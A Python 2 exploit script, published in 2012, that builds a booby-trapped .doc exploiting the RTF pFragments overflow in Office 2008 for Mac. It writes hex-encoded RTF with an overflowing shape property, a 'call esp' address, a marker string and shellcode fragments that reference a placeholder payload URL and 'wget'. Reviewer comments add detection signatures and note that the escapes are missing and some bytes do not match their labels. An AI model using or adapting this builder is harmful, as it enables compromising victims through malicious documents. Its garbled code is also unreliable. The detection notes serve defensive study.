
# Title : Office 2008 sp0 RTF Pfragments MAC exploit
# Published : 2012-04-18
# Author :


#RTF Pfragments exploit for MAC office 2008
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Advanced Hacking Trainings - http://training.aslitsecurity.com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Office 2007 for Mac SP 0
#!/usr/bin/python

# RTF document body, written out as hex pairs. As rendered on this page the
# backslash escapes are absent ("x7b" rather than "\x7b"), so what the
# interpreter actually sees is literal ASCII text, not the byte values the
# pairs name; presumably an extraction artifact of the listing.
# Read as byte values, the pairs decode to an RTF header followed by a
# shape-property block: `{\rtf1{\shp{\sp{\sn pFragments}{\sv 9;2;1111…`,
# i.e. the `\sv` value of a `pFragments` shape property carrying a long run
# of filler digits, a 4-byte hex value the author labels "call esp", more
# filler, and a hex-encoded tail, closed by `}}}}`.
# Detection note: an RTF stream containing a `\sn pFragments` property whose
# `\sv` value is abnormally long is the artifact this listing produces; the
# script saves it under a .doc filename, so the extension alone is not a
# reliable indicator of the real format.
myfile = (
"x7bx5cx72x74x66x31x7bx5cx73x68x70x7bx5cx73x70x7b" 
"x5cx73x6ex20x70x46x72x61x67x6dx65x6ex74x73x7dx7b" 
"x5cx73x76x20x39x3bx32x3bx31x31x31x31x31x31x31x31" 
"x37x35x30x30x32x32x32x32x32x32x32x32x32x32x32x32" 
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32" 
"x32x32x32x32x32x32x32x32x32x32x32x32"
"f069837c"  # call esp  (author's label; a 4-byte value embedded in the hex data)
"x31x31x31x31x31x31x31x31x31x31x31x31"
"x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31" 
"x31x31x31x31x30x30x30x30x30x30x30x30x62x61x30x30" 
"x30x30x35x30x30x30x36x36x38x31x63x61x66x66x30x66" 
"x34x32x35x32x36x61x30x32x35x38x63x64x32x65x33x63" 
"x30x35x35x61x37x34x65x66x62x38x37x30x36x39x36x65"
"x36x37x38x62x66x61x61x66x37x35x65x61x61x66x37x35" 
"x65x37x35x37x63x33x7dx7dx7dx7d"  # closing `}}}}`
)

# Marker appended directly after the RTF body. Decoded, the hex pairs spell
# the ASCII text "pingping"; the same missing-backslash caveat as `myfile`
# applies. Its role is not shown here -- presumably a locator string for
# the stage that follows; confirm against the author's notes.
# Detection note: the literal "pingping" immediately after the RTF closing
# braces is a simple content signature for files built by this script.
sign = (
"x70x69x6ex67x70x69x6ex67"
)

# Second stage, concatenated from fragments. 0xCC is the x86 int3 breakpoint
# opcode, so the leading four bytes read as debugger padding rather than a
# finished payload; the escapes are again missing as rendered on this page.
shellcode = "xCCxCCxCCxCC"
# Download location for a disk-image payload, embedded as plain text.
# Detection note: a URL ending in .DMG inside an RTF/.doc file is an
# unambiguous indicator for this artifact.
shellcode += "http://www.site.com/payload.DMG"
# NOTE(review): the inline comment says "wget http://", but the bytes here do
# not spell that text; looks like a placeholder left by the author -- verify.
shellcode += "x11x3Ax65x89x11x3Ax65x89x11x3Ax65x89" #("wget http://")
shellcode += "wget "
# Four trailing bytes; their meaning is not documented in this listing.
shellcode += "x1Ax18x19x02"

# Write the three pieces back-to-back into a file carrying a .doc extension,
# although the content is RTF text followed by trailing data. The handle is
# never closed, so the write is only flushed when the interpreter exits; a
# `with open(...)` block would be the idiomatic form. `print "Done"` is a
# Python 2 statement, so the script does not run under Python 3.
exploit = open("output.doc", mode="wb")
exploit.write(myfile + sign + shellcode)
print "Done"